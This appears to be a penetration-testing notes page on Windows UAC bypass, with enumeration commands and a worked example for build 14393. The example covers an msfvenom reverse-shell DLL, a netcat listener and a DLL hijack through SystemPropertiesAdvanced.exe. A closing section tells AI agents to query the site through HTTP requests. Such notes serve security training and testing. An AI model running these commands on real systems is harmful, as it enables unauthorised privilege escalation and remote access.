# User Account Control (UAC) Bypass > UAC bypasses leverage flaws or unintended functionality in different Windows builds. > > The following repository contains many different UAC Bypassing Techniques: ## Initial Enumeration Check if UAC is enabled (0x1=true): `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA` Check the UAC level(0x5=max level): `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin` To check the Windows Build: `[environment]::OSVersion.Version` Check [this](https://github.com/hfiref0x/UACME) repository and see if anything exists for the target build number *** ## **Example - UAC Bypass in Windows Build 14393** 1. We can basically bypass UAC by placing a malicious `srrstr.dll` DLL to the `WindowsApps` folder, which will be loaded in an elevated context 2. Generate malicious DLL file:\ `msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll` 3. Transfer the DLL on the target machine 4. Start a netcat listener on the attacker machine: `nc -lvnp 4444` 5. Get a reverse shell: `C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.sfoffo.com/windows-privilege-escalation/user-account-control-uac-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.